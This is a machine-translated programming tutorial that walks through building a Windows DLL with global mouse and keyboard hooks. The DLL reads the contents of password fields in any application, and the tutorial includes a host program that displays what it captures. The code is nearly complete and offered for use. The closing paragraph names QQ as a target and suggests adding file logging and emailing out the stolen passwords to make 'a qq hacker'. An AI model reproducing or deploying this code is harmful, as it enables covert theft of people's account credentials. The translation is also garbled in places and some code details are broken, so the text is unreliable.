Use mouse and keyboard hooks to intercept passwords

Hooks can intercept messages from the system and send haircuts to other applications to complete functions that cannot be completed by General programs. It is necessary to master hook programming methods.

Hook category:
1. wh_callwndproc and wh_callwndprocret: enables you to monitor messages sent to the window process.
3. wh_debug debugging hook
4. When the foreground thread of the wh_foregroundidle application changes to idle, the system will call wh_foregroundidl.
5. wh_journalrecord monitors and records input events
6. wh_journalplayback uses wh_journalrecord to record events
7. wh_keyboard keyboard hook
9. wh_keyboard_ll low-layer keyboard hook
10. wh_mouse
11. wh_mouse_ll underlying mouse hook
12. wh_shell SHELL hook
13. wh_msgfilter and wh_sysmsgfilter allow us to monitor menus, scroll bars, and message boxes.

Installation HOOK:
Call the setwindowshookex function to install the hook. Its function prototype is:
Hhook setwindowshookex (INT idhook, hookproc lpfn, instance hmod, DWORD dwthreadid)
Idhook indicates the hook type, which corresponds to the hook function type one by one. For example, wh_keyboard and wh_mouse.
Lpfn is the address of the hook function.
Hmod is the handle of the instance where the hook function is located. For a thread hook, this parameter is null. For a system hook, this parameter is the DLL handle of the hook function. (The system hook must be in the DLL)
Dwthreadid specifies the thread number monitored by the hook. For global hooks, this parameter is null.
Setwindowshookex returns the mounted hook handle.

Uninstall hook
Call the bool unhookwindowshookex (hhook HHK) function to uninstall the hook.

Define Hook Functions
A hook function is a special callback function. After a specific event under hook monitoring occurs, the system calls the hook function for processing. Generally:
Lresult winapi myhookproc (INT ncode, wparam, lparam)
The wparam and lparam parameters contain the information of the hook message, such as the mouse position, status, and keyboard buttons. Ncode contains messages about the message itself, such as whether to remove messages from the message queue.

Instance:
Next we will install the mouse hook. And the keyboard hook also intercept the entered password, and you can view * password as an example to explain how to use the hook.

1. In the wizard, create an MFC Appwizard (DLL) named getpass and select the MFC extension DLL.
2. Create a cgetpasshook class, the base class: cobject, and add starthook, stophook, and function as follows:
Class afx_ext_class cgetpasshook: Public cobject
{
Public:
Bool stophook ();
Bool starthook (hwnd );
 
Cgetpasshook ();
Virtual ~ Cgetpasshook ();

};
3: add global shared data as follows:
# Pragma data_seg ("invalid data ")
Hhook hkeyboardhook = NULL; file: // keyboar hook
Hhook hmousehook = NULL; file: // mouse hook
Hinstance glhinstance = NULL; file: // globle instance
Hwnd houtputwnd = NULL; file: // display pass WND
# Pragma data_seg ()

4: add the mouse and use the keyboard hook processing function as follows:
Lresult winapi mousehookproc (INT ncode, wparam, lparam)
{File: // mouse hook processing function
Lpmousehookstruct lpmouse = (mousehookstruct far *) lparam;
If (ncode> = 0)
{
Hwnd htargethwnd = lpmouse-> hwnd; file: // get the handle of the window where the mouse is located
If (htargethwnd)
{
Long style =: getwindowlong (htargethwnd, gwl_style); file: // get its style
If (Style & es_password) file: // if it is a password box
{
Char szpass [255];
: Sendmessage (htargethwnd, wm_gettext, 255, (lparam) szpass );
File: // get the password
: Sendmessage (houtputwnd, wm_settext, 0, (lparam) szpass );
File: // display Password
}
}
}
 
Return callnexthookex (hmousehook, ncode, wparam, lparam );
File: // with this sentence added, you can continue to transmit the message. If not, the message will be canceled,
File: // It Can Be Used to intercept a message. We will call it here.
}

Lresult winapi keyboardproc (INT ncode, wparam, lparam)
{File: // keyboard hook proc

If (ncode> = 0)
{
Hwnd htargethwnd = getactivewindow (); file: // get active window
If (htargethwnd)
Enumchildwindows (htargethwnd, enumwndproc, 0); file: // enumerate all windows
}

Return callnexthookex (hkeyboardhook, ncode, wparam, lparam );
File: // with this sentence added, you can continue to transmit the message. If not, the message will be canceled,
File: // It Can Be Used to intercept a message. We will call it here.
}

Here we will introduce the enumchildwindows function. Its prototype is as follows:
Bool enumchildwindows (hwnd hwndparent, windenumproc lpenumfunc, lparam );
Hwndparent: handle of the enumeration window
Lpenumfunc: Address of the enumeration function,
Lparam: 0

 

5: functions added to the enumeration window. As shown in the following figure: (Note that this function is required for the previous function. Therefore, it must be declared or defined before the preceding function.

Bool winapi enumwndproc (hwnd, lparam)
{File: // Enum the Child Window, find passedit
If (hwnd)
{
Long style =: getwindowlong (hwnd, gwl_style); file: // get the style
If (Style & es_password) file: // Password box
{
Char szpass [255];
: Sendmessage (hwnd, wm_gettext, 255, (lparam) szpass); file: // get pass
: Sendmessage (houtputwnd, wm_settext, 0, (lparam) szpass); file: // display
Return true;
}
}

Return true;
}

6: Define the segment attribute in the def file: (this step is important)
Sections
Mydata read write shared

7. Complete the starthook and stophook functions and start/Close the hooks as follows:
Bool cgetpasshook: starthook (hwnd)
{File: // install hoook
Hmousehook = setwindowshookex (wh_mouse, mousehookproc, glhinstance, 0 );
File: // mouse hook
Hkeyboardhook = setwindowshookex (wh_keyboard, keyboardproc, glhinstance, 0 );
File: // keyboard hook
If (hmousehook & hkeyboardhook)
{
Houtputwnd = hwnd; file: // display the password handle
Return true;
}
Return false;
}

Bool cgetpasshook: stophook ()
{File: // unstall hook
Bool mhook = unhookwindowshookex (hmousehook );
Bool khook = unhookwindowshookex (hkeyboardhook );
If (mhook & khook)
Return true;
Return false;
}

8: Obtain the DLL handle in the dllmain function and use the glhinstance variable. Therefore, add the following statement:
Extern hinstance glhinstance; file: // remember here
Extern "C" int apientry
Dllmain (hinstance, DWORD dwreason, lpvoid lpreserved)
{
Unreferenced_parameter (lpreserved );
If (dwreason = dll_process_attach)
{
Trace0 ("getpass. dll initializing! /N ");

If (! Afxinitextensionmodule (getpassdll, hinstance ))
Return 0;
New cdynlinklibrary (getpassdll );
Glhinstance = hinstance; file: // get the handle
}
Else if (dwreason = dll_process_detach)
{
Trace0 ("getpass. dll terminating! /N ");
Afxtermextensionmodule (getpassdll );
}
Return 1; // OK
}

9: Compile and complete the DLL part,

The following section describes how to create an app. As follows:

1: Create an MFC Appwizard (exe) and name it GetPassword. in step 1, add to current workspace to the current workspace, which is convenient.

2: Copy getpass. lib and getpasshook. h In the DLL to the directory where the app is located, and then project-> Add to project --> files
Select the two files.

2: In the main dialog box, add an edit with ID idc_edit_pass.

3: Include the getpasshook. h file in cgetpassworddlg. h and declare an object. As follows:

# Include "getpasshook. H"
Class cgetpassworddlg: Public cdialog
{
Protected:
Cgetpasshook m_hook;
...
Declare_message_map ()
};

4: Start the hook in the implementation file: oninitdialog ()

Bool cgetpassworddlg: oninitdialog ()
{
Cwnd * pwnd = getdlgitem (idc_edit_pass );
M_hook.starthook (pwnd-> getsafehwnd (); file: // install hook

Return true; // return true unless you set the focus to a control
}

5: add the wm_destroy message and stop the hook when exiting the program, as shown below:
Void cgetpassworddlg: ondestroy ()
{
Cdialog: ondestroy ();
M_hook.stophook (); file: // stop hook
}

6: Copy getpass. DLL. EXE directory,

7: Compile and run.
In this way, when you enter the password in any password box, the password will be intercepted. Even if the keyboard hook fails, move the mouse to the password box and get the * password because we have installed two hooks. Start QQ, enter the password, and try to see if the password has been intercepted? Make a slight modification to the program, output the intercepted password to the file, and add the email sending attack capability. a qq hacker is created.